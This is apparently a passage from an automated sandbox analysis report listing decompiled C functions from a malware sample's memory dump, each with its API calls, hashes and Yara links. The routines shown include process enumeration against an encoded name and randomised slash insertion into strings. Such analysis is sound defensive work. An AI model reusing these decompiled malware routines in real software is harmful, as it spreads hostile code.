                                                          • Sleep.KERNEL32(00000BB8,?,?,?,047F52AA,?,00000001,?,00000002,?,?,047F5D5E,?), ref: 047F371A
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,047F52AA,?,00000001,?,00000002,?,?,047F5D5E,?), ref: 047F3721
                                                            • Part of subcall function 047FA446: WaitForSingleObject.KERNEL32(00000000,?,?,?,047F3741,?,047F3741,?,?,?,?,?,047F3741,?), ref: 047FA520
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                          • String ID:
                                                          • API String ID: 2559942907-0
                                                          • Opcode ID: a8a8b9535bee5d0395750fb1bbd972faca61e0214641444a3fe22b04688d8af1
                                                          • Instruction ID: db0933abbcda924ab8d8a59bc18421c1f1bb8488f4beea3262012b321c04e462
                                                          • Opcode Fuzzy Hash: a8a8b9535bee5d0395750fb1bbd972faca61e0214641444a3fe22b04688d8af1
                                                          • Instruction Fuzzy Hash: 392165B2900259EBDB11BFE9CDC88EEB7ADEB44354B058425EF15A7300D734B9458BB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F17E5, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E047F17E5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x47fd238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x47fd250; // 0xa7e8b4ee
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x47fd250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                          0x047f17ed
                                                          0x047f17f0
                                                          0x047f17f6
                                                          0x047f180e
                                                          0x047f1810
                                                          0x047f1815
                                                          0x047f1817
                                                          0x047f181a
                                                          0x047f181c
                                                          0x047f181f
                                                          0x047f1821
                                                          0x047f1821
                                                          0x047f1823
                                                          0x047f182e
                                                          0x047f1833
                                                          0x047f1844
                                                          0x047f184c
                                                          0x047f1851
                                                          0x047f1854
                                                          0x047f1857
                                                          0x047f1859
                                                          0x047f185c
                                                          0x047f185f
                                                          0x047f185f
                                                          0x047f1862
                                                          0x047f186d
                                                          0x047f1872
                                                          0x047f187c

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,047F1C49,00000000,?,?,047F20C2,?,052E95B0), ref: 047F17F0
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 047F1808
                                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,047F1C49,00000000,?,?,047F20C2,?,052E95B0), ref: 047F184C
                                                          • memcpy.NTDLL(00000001,?,00000001), ref: 047F186D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: 8f2b4ec20c01af766237d4bf7bb0e9f1bde90ec52f33e95b16ff72a9b3412925
                                                          • Instruction ID: b0725c4533f5c9cb1028b9b367f73ea45a21089013676e7a69914a48973f1c47
                                                          • Opcode Fuzzy Hash: 8f2b4ec20c01af766237d4bf7bb0e9f1bde90ec52f33e95b16ff72a9b3412925
                                                          • Instruction Fuzzy Hash: A311C672A00114AFE7108BA9DE88E9EBBAAEB84260F454176F605DB350E7749E0597A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F486F, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E047F486F(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E047FA71F(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x47fc284);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x47fc284);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}










                                                          0x047f487a
                                                          0x047f487e
                                                          0x047f4880
                                                          0x047f4881
                                                          0x047f4889
                                                          0x047f4889
                                                          0x047f488d
                                                          0x00000000
                                                          0x00000000
                                                          0x047f4884
                                                          0x047f4885
                                                          0x047f4888
                                                          0x047f4888
                                                          0x047f4895
                                                          0x047f489a
                                                          0x047f48a0
                                                          0x047f48a8
                                                          0x047f48ae
                                                          0x047f48b0
                                                          0x047f48b5
                                                          0x047f48b9
                                                          0x047f48bb
                                                          0x047f48be
                                                          0x047f48c5
                                                          0x047f48c5
                                                          0x047f48cf
                                                          0x047f48d2
                                                          0x047f48d3
                                                          0x047f48d5
                                                          0x047f48e1
                                                          0x047f48e1
                                                          0x047f48ee

                                                          APIs
                                                          • StrChrA.SHLWAPI(?,00000020,00000000,052E95AC,?,047F5D25,?,047F243F,052E95AC,?,047F5D25), ref: 047F4889
                                                          • StrTrimA.SHLWAPI(?,047FC284,00000002,?,047F5D25,?,047F243F,052E95AC,?,047F5D25), ref: 047F48A8
                                                          • StrChrA.SHLWAPI(?,00000020,?,047F5D25,?,047F243F,052E95AC,?,047F5D25), ref: 047F48B3
                                                          • StrTrimA.SHLWAPI(00000001,047FC284,?,047F5D25,?,047F243F,052E95AC,?,047F5D25), ref: 047F48C5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Trim
                                                          • String ID:
                                                          • API String ID: 3043112668-0
                                                          • Opcode ID: 7bf8c614952035ff378c02fb2f68c36cd306cef076bca20e40060d87e86492ed
                                                          • Instruction ID: a93f216d46a4df50e3c135fc5822ff5e44081e9a23c0d4e98afa33bb91804446
                                                          • Opcode Fuzzy Hash: 7bf8c614952035ff378c02fb2f68c36cd306cef076bca20e40060d87e86492ed
                                                          • Instruction Fuzzy Hash: 83012871601365AFD2319F698C4CE2BBB9CFB55A60F510519FA42C7340EB64E80196B0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047FA65C, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E047FA65C() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x47fd2a8; // 0xaea5a8
						_t2 = _t9 + 0x47fee34; // 0x73617661
						_push( &_v264);
						if( *0x47fd0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                                          0x047fa667
                                                          0x047fa671
                                                          0x047fa675
                                                          0x047fa67f
                                                          0x047fa6b0
                                                          0x047fa686
                                                          0x047fa68b
                                                          0x047fa698
                                                          0x047fa6a1
                                                          0x047fa6b8
                                                          0x047fa6a3
                                                          0x047fa6ab
                                                          0x00000000
                                                          0x047fa6ab
                                                          0x047fa6b9
                                                          0x047fa6ba
                                                          0x00000000
                                                          0x047fa6ba
                                                          0x00000000
                                                          0x047fa6b4
                                                          0x047fa6c0
                                                          0x047fa6c5

                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 047FA66C
                                                          • Process32First.KERNEL32(00000000,?), ref: 047FA67F
                                                          • Process32Next.KERNEL32(00000000,?), ref: 047FA6AB
                                                          • CloseHandle.KERNEL32(00000000), ref: 047FA6BA
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 420147892-0
                                                          • Opcode ID: 800e1d977af85317340a24301c2fc2362f675565ff3a2f43c21e28256ab8b5f5
                                                          • Instruction ID: 196612f3ae41ba485fccb8bad7dc20740152359660f4be6180f4dca724b7c968
                                                          • Opcode Fuzzy Hash: 800e1d977af85317340a24301c2fc2362f675565ff3a2f43c21e28256ab8b5f5
                                                          • Instruction Fuzzy Hash: 1FF0B436201124ABE721FABA9C4CDEB77ACEBC5755F014161EB09D3300EA24FE4986A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F6840, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E047F6840(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                                          0x047f684a
                                                          0x047f684e
                                                          0x047f6863
                                                          0x047f6865
                                                          0x047f686a
                                                          0x047f6870
                                                          0x047f6872
                                                          0x047f6877
                                                          0x047f6882
                                                          0x047f6879
                                                          0x047f6879
                                                          0x047f6879
                                                          0x047f6877
                                                          0x047f6890

                                                          APIs
                                                          • memset.NTDLL ref: 047F684E
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74B481D0), ref: 047F6863
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 047F6870
                                                          • CloseHandle.KERNEL32(?), ref: 047F6882
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CreateEvent$CloseHandlememset
                                                          • String ID:
                                                          • API String ID: 2812548120-0
                                                          • Opcode ID: aff55e964845c7660d28dc52922bb2547b3814d710ef77c2359d3cc72c3601bc
                                                          • Instruction ID: 1fa8499a3fb9d870af32cd8dd494677d3c5752d4faa86cbdfe48f08298b98997
                                                          • Opcode Fuzzy Hash: aff55e964845c7660d28dc52922bb2547b3814d710ef77c2359d3cc72c3601bc
                                                          • Instruction Fuzzy Hash: 8FF0FEF150430CBFD3106F66DCC4C27BBACFB95299B118A2EF64682611D676B84A8A60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F1B42, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E047F1B42() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x47fd26c; // 0x2c8
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x47fd2bc; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x47fd26c; // 0x2c8
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x47fd238; // 0x4ef0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                          0x047f1b42
                                                          0x047f1b49
                                                          0x047f1b93
                                                          0x047f1b95
                                                          0x047f1b95
                                                          0x047f1b4d
                                                          0x047f1b53
                                                          0x047f1b58
                                                          0x047f1b5c
                                                          0x047f1b62
                                                          0x047f1b69
                                                          0x00000000
                                                          0x00000000
                                                          0x047f1b6b
                                                          0x047f1b70
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x047f1b70
                                                          0x047f1b72
                                                          0x047f1b7a
                                                          0x047f1b7d
                                                          0x047f1b7d
                                                          0x047f1b83
                                                          0x047f1b8a
                                                          0x047f1b8d
                                                          0x047f1b8d
                                                          0x00000000

                                                          APIs
                                                          • SetEvent.KERNEL32(000002C8,00000001,047F4F0E), ref: 047F1B4D
                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 047F1B5C
                                                          • CloseHandle.KERNEL32(000002C8), ref: 047F1B7D
                                                          • HeapDestroy.KERNEL32(04EF0000), ref: 047F1B8D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CloseDestroyEventHandleHeapSleep
                                                          • String ID:
                                                          • API String ID: 4109453060-0
                                                          • Opcode ID: 4659a856360212cf153415897acd8fc959c571b2f946fbbaf505c48732245be9
                                                          • Instruction ID: 7242c8ae94543f572d8f85c0cd71e10fb707b3a5388b80e961c4b3f57fd6ae72
                                                          • Opcode Fuzzy Hash: 4659a856360212cf153415897acd8fc959c571b2f946fbbaf505c48732245be9
                                                          • Instruction Fuzzy Hash: 98F03071B11311DBEB205BB9ED48E963B98FB04771B488614BD05D7384EB78EC4597A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F23F4, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 50%
                                                          			E047F23F4(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x47fd32c; // 0x52e95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x47fd32c; // 0x52e95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x47fd030) {
					HeapFree( *0x47fd238, 0, _t8);
				}
				_t14[1] = E047F486F(_v0, _t14);
				_t11 =  *0x47fd32c; // 0x52e95b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                                          0x047f23f4
                                                          0x047f23f4
                                                          0x047f23fd
                                                          0x047f240d
                                                          0x047f240d
                                                          0x047f2412
                                                          0x047f2417
                                                          0x00000000
                                                          0x00000000
                                                          0x047f2407
                                                          0x047f2407
                                                          0x047f2419
                                                          0x047f241d
                                                          0x047f242f
                                                          0x047f242f
                                                          0x047f243f
                                                          0x047f2442
                                                          0x047f2447
                                                          0x047f244b
                                                          0x047f2451

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(052E9570), ref: 047F23FD
                                                          • Sleep.KERNEL32(0000000A,?,047F5D25), ref: 047F2407
                                                          • HeapFree.KERNEL32(00000000,00000000,?,047F5D25), ref: 047F242F
                                                          • RtlLeaveCriticalSection.NTDLL(052E9570), ref: 047F244B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 74d2e4919e6ed11a7b7feddfb13239283ebcb11831c064cb43ed4ea792f1b60b
                                                          • Instruction ID: 75d94da8021709d75257ddf1ac2b7fe54c2bc58c32c60bf827df35aead1e9fbf
                                                          • Opcode Fuzzy Hash: 74d2e4919e6ed11a7b7feddfb13239283ebcb11831c064cb43ed4ea792f1b60b
                                                          • Instruction Fuzzy Hash: 9EF03A70600140DFE721DF68ED48F9A77E4FF18741B00C800FA02C6351D768EC41EA55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F6702, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E047F6702() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x47fd32c; // 0x52e95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x47fd32c; // 0x52e95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x47fd32c; // 0x52e95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x47fe81a) {
					HeapFree( *0x47fd238, 0, _t10);
					_t7 =  *0x47fd32c; // 0x52e95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                          0x047f6702
                                                          0x047f670b
                                                          0x047f671b
                                                          0x047f671b
                                                          0x047f6720
                                                          0x047f6725
                                                          0x00000000
                                                          0x00000000
                                                          0x047f6715
                                                          0x047f6715
                                                          0x047f6727
                                                          0x047f672c
                                                          0x047f6730
                                                          0x047f6743
                                                          0x047f6749
                                                          0x047f6749
                                                          0x047f6752
                                                          0x047f6754
                                                          0x047f6758
                                                          0x047f675e

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(052E9570), ref: 047F670B
                                                          • Sleep.KERNEL32(0000000A,?,047F5D25), ref: 047F6715
                                                          • HeapFree.KERNEL32(00000000,?,?,047F5D25), ref: 047F6743
                                                          • RtlLeaveCriticalSection.NTDLL(052E9570), ref: 047F6758
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 1c44efb08cebc7151da96128cd1ae0362d2afe0d55bb30f36efade294f6c39aa
                                                          • Instruction ID: b39d9bad62584ddb64c50fa42ac5a54a5cf5af0056c8c73f2a6e7ae500cd43ce
                                                          • Opcode Fuzzy Hash: 1c44efb08cebc7151da96128cd1ae0362d2afe0d55bb30f36efade294f6c39aa
                                                          • Instruction Fuzzy Hash: 05F0B2B4600100DFE7298B64DD99F9977E9FF08711B04C419EA02D73A0D638AC02DA20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F5AF1, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 58%
                                                          			E047F5AF1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E047FA71F(_t2);
				if(_t34 != 0) {
					_t30 = E047FA71F(_t28);
					if(_t30 == 0) {
						E047FA734(_t34);
					} else {
						_t39 = _a4;
						_t22 = E047FA782(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E047FA782(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                          0x047f5af1
                                                          0x047f5afb
                                                          0x047f5afd
                                                          0x047f5b03
                                                          0x047f5b03
                                                          0x047f5b0c
                                                          0x047f5b10
                                                          0x047f5b1c
                                                          0x047f5b20
                                                          0x047f5b94
                                                          0x047f5b22
                                                          0x047f5b22
                                                          0x047f5b26
                                                          0x047f5b2b
                                                          0x047f5b30
                                                          0x047f5b4a
                                                          0x047f5b39
                                                          0x047f5b39
                                                          0x047f5b3d
                                                          0x047f5b40
                                                          0x047f5b45
                                                          0x047f5b45
                                                          0x047f5b4f
                                                          0x047f5b77
                                                          0x047f5b7d
                                                          0x047f5b80
                                                          0x047f5b51
                                                          0x047f5b53
                                                          0x047f5b5b
                                                          0x047f5b66
                                                          0x047f5b6b
                                                          0x047f5b6b
                                                          0x047f5b87
                                                          0x047f5b8e
                                                          0x047f5b8f
                                                          0x047f5b8f
                                                          0x047f5b20
                                                          0x047f5b9f

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,047F3E08,?,?,?,?,00000102,047F67B8,?,?,00000000), ref: 047F5AFD
                                                            • Part of subcall function 047FA71F: RtlAllocateHeap.NTDLL(00000000,00000000,047F5595), ref: 047FA72B
                                                            • Part of subcall function 047FA782: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,047F5B2B,00000000,00000001,00000001,?,?,047F3E08,?,?,?,?,00000102), ref: 047FA790
                                                            • Part of subcall function 047FA782: StrChrA.SHLWAPI(?,0000003F,?,?,047F3E08,?,?,?,?,00000102,047F67B8,?,?,00000000,00000000), ref: 047FA79A
                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,047F3E08,?,?,?,?,00000102,047F67B8,?), ref: 047F5B5B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 047F5B6B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 047F5B77
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3767559652-0
                                                          • Opcode ID: c8b525d82762111a442d3b8851a0c16ba4863dc5ccf45bba5fb890e6ec24743b
                                                          • Instruction ID: 66dff234a5ba07e29bbfe2cf426d9045cf6ff3e43a00fb7fbf7bd7f31cc7c4ff
                                                          • Opcode Fuzzy Hash: c8b525d82762111a442d3b8851a0c16ba4863dc5ccf45bba5fb890e6ec24743b
                                                          • Instruction Fuzzy Hash: 7F21AF76514259FFDB126F74CC48EAABFB9EF06294B148054FA099F302E634E90197F0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F45C6, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E047F45C6(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E047FA71F(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                          0x047f45db
                                                          0x047f45df
                                                          0x047f45e9
                                                          0x047f45ee
                                                          0x047f45f3
                                                          0x047f45f5
                                                          0x047f45fd
                                                          0x047f4602
                                                          0x047f4610
                                                          0x047f4615
                                                          0x047f461f

                                                          APIs
                                                          • lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,052E935C,?,047F8D93,004F0053,052E935C,?,?,?,?,?,?,047F523E), ref: 047F45D6
                                                          • lstrlenW.KERNEL32(047F8D93,?,047F8D93,004F0053,052E935C,?,?,?,?,?,?,047F523E), ref: 047F45DD
                                                            • Part of subcall function 047FA71F: RtlAllocateHeap.NTDLL(00000000,00000000,047F5595), ref: 047FA72B
                                                          • memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,047F8D93,004F0053,052E935C,?,?,?,?,?,?,047F523E), ref: 047F45FD
                                                          • memcpy.NTDLL(74B069A0,047F8D93,00000002,00000000,004F0053,74B069A0,?,?,047F8D93,004F0053,052E935C), ref: 047F4610
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlenmemcpy$AllocateHeap
